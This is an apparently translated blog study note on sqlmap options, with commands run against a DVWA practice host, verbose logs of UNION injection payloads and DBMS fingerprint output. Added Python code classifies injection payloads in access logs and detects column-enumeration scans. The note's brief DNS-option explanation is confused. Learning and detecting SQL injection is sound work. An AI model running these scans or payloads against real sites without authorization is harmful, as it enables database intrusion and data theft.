Sqlmap study notes (d)

Specifying the injection technique

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique="BEUSTQ" 

B : Boolean-based blind injection

E : Error-based injection

U : UNION query injection

S : Stacked queries injection

T : Time-based blind injection

Q : Inline queries injection

All injection techniques are used by default, i.e. --technique="BEUSTQ"
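The six technique letters above also describe what the injected requests look like on the wire, which is what a web application firewall or log reviewer sees. The following is an added example, not code from the original notes or from sqlmap itself: it URL-decodes a request parameter value and reports which sqlmap technique letters its contents suggest. The indicator patterns are assumed heuristics written for this example (sqlmap's own detection logic is different), and the sample parameter values are constructed to resemble what an access log would contain.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# sqlmap technique letters, as listed in the --technique option
TECHNIQUES = {
    "B": "Boolean-based blind",
    "E": "Error-based",
    "U": "UNION query-based",
    "S": "Stacked queries",
    "T": "Time-based blind",
    "Q": "Inline queries",
}

# Indicator patterns per technique. These are assumed heuristics for log triage,
# not sqlmap's own logic; a payload may legitimately match more than one letter.
PATTERNS = [
    ("T", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I)),
    ("S", re.compile(r";\s*(select|insert|update|delete|drop|exec|waitfor)\b", re.I)),
    # UNION SELECT itself, plus the ORDER BY n probes used to count columns
    ("U", re.compile(r"\bunion\s+(all\s+)?select\b|\border\s+by\s+\d+", re.I)),
    ("E", re.compile(r"\b(extractvalue|updatexml|floor\s*\(\s*rand|convert\s*\(\s*int)\b", re.I)),
    ("Q", re.compile(r"\(\s*select\b", re.I)),
    ("B", re.compile(r"\b(and|or)\b\s+[\w'\"]+\s*=\s*[\w'\"]+", re.I)),
]


def classify(param_value: str) -> str:
    """Return the technique letters whose indicators appear in the decoded value,
    in BEUSTQ order; an empty string means nothing suspicious matched."""
    decoded = unquote_plus(param_value)  # access logs store the value URL-encoded
    hits = {letter for letter, rx in PATTERNS if rx.search(decoded)}
    return "".join(letter for letter in "BEUSTQ" if letter in hits)


def technique_counts(values):
    """Count how often each technique letter appears across a list of parameter values,
    which gives a quick picture of which sqlmap techniques a scan was running."""
    counts = Counter()
    for value in values:
        counts.update(classify(value))
    return dict(counts)


# Constructed sample: parameter values as they might appear URL-encoded in an access log.
SAMPLE_REQUESTS = [
    "1",                                                            # benign
    "1%27+AND+1%3D1--+",                                            # B
    "1%29+AND+SLEEP%285%29--+",                                     # T
    "-5546%29+UNION+ALL+SELECT+123--+ueOQ",                         # U (from the page's log)
    "1%3B+SELECT+SLEEP%285%29--+",                                  # S and T
    "1+AND+extractvalue%281%2Cconcat%280x7e%2Cversion%28%29%29%29", # E
    "1+AND+%28SELECT+1+FROM+users+LIMIT+1%29%3D1",                  # Q
]

if __name__ == "__main__":
    for value in SAMPLE_REQUESTS:
        letters = classify(value)
        names = ", ".join(TECHNIQUES[c] for c in letters) or "no indicator"
        print(f"{unquote_plus(value)!r:60} -> {letters or '-':6} {names}")
    print(technique_counts(SAMPLE_REQUESTS))
```

The classifier returns every matching letter rather than the first, because a stacked query that sleeps is both S and T, and a rule that picks one would hide the other when reviewing a scan.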

Setting the time-based blind injection delay

--time-sec : sets the delay used for time-based blind injection, in seconds; the default is 5 seconds

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique=T --time-sec=1 

UNION query injection parameters

--union-cols : sets the number of columns to test in UNION query injection; the default range is 1-10. Raising --level also increases the number of columns tested, but --union-cols sets a fixed column range. For example, to test UNION queries with 12-18 columns:

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-cols="12-18"

--union-char : sets the character used in UNION query injection; the default is NULL. At a higher --level, sqlmap also tests with a random number, because in some cases a UNION query test with NULL fails while one with a random number succeeds. For example, to set the UNION character to "123":

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-char="123" -v 3

With 123 as the UNION character, the default 1-10 columns are tried:

[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
[22:19:33] [PAYLOAD] -1370) UNION ALL SELECT 123,123,123,123,123-- iprn
[22:19:33] [PAYLOAD] -5507) UNION ALL SELECT 123,123,123,123,123,123-- Inhq
[22:19:33] [PAYLOAD] -9862) UNION ALL SELECT 123,123,123,123,123,123,123-- IwGO
[22:19:33] [PAYLOAD] -5351) UNION ALL SELECT 123,123,123,123,123,123,123,123-- EdWF
[22:19:33] [PAYLOAD] -3384) UNION ALL SELECT 123,123,123,123,123,123,123,123,123-- ThkG
[22:19:33] [PAYLOAD] -6285) UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123-- vyBV

--union-from : sets the table used in the FROM clause of the UNION query; here the users table is given as the table for UNION injection

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-from="users" -v 3

The default NULL is used as the query character, the column range is 1-10, and the specified table is users:

[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL FROM users-- MuVY
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM users-- Wijp
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM users-- wYUU
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- rWYB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LvGo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LnTt
[22:27:17] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- YGVF
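The two -v 3 listings above show exactly how --union-char and --union-from change the probes sqlmap sends: an ORDER BY probe pair, then UNION ALL SELECT with one more column on each request. The following is an added example, not part of the original notes and not sqlmap code: it parses PAYLOAD lines from that verbose output (the sample log text is an excerpt of the listings above, embedded here as a constructed string), recovers the column counts, union character and FROM table that were used, and flags the strictly increasing column-count run that identifies automated column enumeration in server-side logs. The function names and the `min_steps` threshold are assumptions made for this example.

```python
import re

# Constructed excerpts of the page's own sqlmap -v 3 output (--union-char="123" run)
LOG_UNION_CHAR = """\
[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
"""

# Constructed excerpt of the --union-from="users" run, including a non-PAYLOAD line
LOG_UNION_FROM = """\
[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
"""

PAYLOAD_RX = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[PAYLOAD\] (.*)$")
# Column list up to the optional FROM <table>, terminated by sqlmap's "--" comment
UNION_RX = re.compile(r"UNION ALL SELECT (?P<cols>.+?)(?: FROM (?P<table>\w+))?--", re.I)
ORDER_RX = re.compile(r"ORDER BY (\d+)--", re.I)


def parse_payloads(log_text):
    """Yield (timestamp, payload) for each PAYLOAD line; other log levels are skipped."""
    for line in log_text.splitlines():
        m = PAYLOAD_RX.match(line)
        if m:
            yield m.group(1), m.group(2)


def union_probe_summary(log_text):
    """Summarise what the UNION probes reveal: ORDER BY values tried, the column
    counts in the order they were sent, the union character(s) and FROM table(s)."""
    summary = {"order_by": [], "column_counts": [], "union_chars": set(), "from_tables": set()}
    for _, payload in parse_payloads(log_text):
        m = ORDER_RX.search(payload)
        if m:
            summary["order_by"].append(int(m.group(1)))
            continue
        m = UNION_RX.search(payload)
        if m:
            cols = [c.strip() for c in m.group("cols").split(",")]
            summary["column_counts"].append(len(cols))
            summary["union_chars"].update(cols)
            if m.group("table"):
                summary["from_tables"].add(m.group("table"))
    return summary


def looks_like_column_enumeration(column_counts, min_steps=3):
    """A strictly increasing run of column counts starting at 1 is the signature of
    automated UNION column discovery; min_steps avoids flagging a single stray request."""
    n = len(column_counts)
    return n >= min_steps and column_counts == list(range(1, n + 1))


if __name__ == "__main__":
    for name, log in (("union-char", LOG_UNION_CHAR), ("union-from", LOG_UNION_FROM)):
        s = union_probe_summary(log)
        print(name, s, "enumeration:", looks_like_column_enumeration(s["column_counts"]))
```

Because sqlmap tags every probe with a random trailing comment token and a random negative id, matching on those values is pointless; the stable feature is the shape of the sequence, which is what the enumeration check keys on.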

DNS attack

--dns-domain : attack by specifying a DNS server; the target needs to have a DNS service open on port 53.

sqlmap -u "target URL" --dns-domain="target URL"

Obtaining the database fingerprint information

-f or --fingerprint

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=8jh3juigrkaqipeu1oiinhcpbi; security=low" -f

From the output, the database is MySQL and the version is 5.7:

[20:15:10] [INFO] testing MySQL
[20:15:10] [INFO] confirming MySQL
[20:15:11] [INFO] the back-end DBMS is MySQL
[20:15:11] [INFO] actively fingerprinting MySQL
[20:15:11] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
               html error message fingerprint: MySQL


Source: www.cnblogs.com/dagger9527/p/12013878.html